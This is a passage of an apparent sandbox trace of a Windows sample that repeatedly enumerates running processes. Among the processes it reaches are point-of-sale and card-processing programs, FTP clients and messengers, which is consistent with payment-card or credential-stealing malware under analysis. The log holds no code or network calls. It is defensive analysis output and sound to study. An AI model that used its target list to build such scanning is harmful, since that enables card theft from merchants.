lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0189.849] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0189.852] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0189.854] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0189.857] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0189.859] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0189.861] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0189.864] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0189.871] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0189.876] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0189.878] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0189.881] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0189.883] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0189.886] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0189.889] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0189.891] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0189.894] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0189.983] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0189.987] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0189.989] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0189.992] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0189.994] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0190.002] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0190.005] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0190.007] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.011] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0190.014] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.016] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.019] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0190.021] CloseHandle (hObject=0x18ec) returned 1 [0190.021] Sleep (dwMilliseconds=0x64) [0190.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c0 [0190.156] Process32First (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.157] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.159] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.161] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.163] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.164] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.166] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.168] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.171] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.172] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.174] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.176] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.177] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.179] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.222] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.226] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.228] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.230] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.231] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.233] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.234] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.236] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.238] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.240] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.241] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.243] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.245] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0190.246] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0190.248] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.250] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.251] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.253] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.255] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0190.257] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.371] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.373] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.380] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.381] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.383] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0190.385] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0190.386] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0190.388] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0190.390] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0190.391] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0190.393] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0190.394] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0190.396] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0190.398] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0190.399] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0190.401] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0190.402] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0190.404] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0190.406] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0190.407] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0190.409] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0190.471] Process32Next (in: hSnapshot=0x14c0, 